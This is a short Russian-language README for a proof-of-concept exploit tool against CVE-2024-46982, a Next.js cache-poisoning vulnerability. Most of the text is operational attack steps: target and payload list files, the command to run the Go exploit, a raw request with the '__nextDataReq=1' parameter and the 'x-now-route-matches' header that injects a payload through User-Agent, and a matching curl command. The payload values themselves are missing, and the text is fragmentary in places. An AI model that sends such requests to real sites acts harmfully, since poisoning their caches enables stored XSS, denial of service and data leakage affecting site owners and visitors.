
POC CVE-2024-46982
Этот инструмент автоматизирует обнаружение и эксплуатацию CVE-2024-46982, уязвимости отравления кэша в Next.js, при которой ответы серверного рендеринга (SSR) могут быть ошибочно закэшированы как статическая генерация сайта (SSG). Такая неправильная конфигурация может привести к хранимым XSS, DoS и утечке данных, позволяя злоумышленникам внедрять вредоносный контент в закэшированные ответы.
Создайте файл с именем targets.txt, содержащий по одному целевому URL на строку:
https://vulnerable-site.com
https://another-target.com
Создайте файл с именем payloads.txt, содержащий полезные нагрузки, которые будут внедрены через заголовок User-Agent:
Скомпилируйте и выполните эксплойт с помощью:
go run exploit.go -f targets.txt -p payloads.txt -d 5
GET /poc?__nextDataReq=1 HTTP/1.1
Host: vulnerable-site.com
User-Agent: <PAYLOAD>
x-now-route-matches: 1
Отправьте вредоносный запрос с помощью curl:
curl -X GET "https://vulnerable-site.com/poc?__nextDataReq=1" \
-H "User-Agent: " \
-H "x-now-route-matches: 1"
Посетите конечную точку в браузере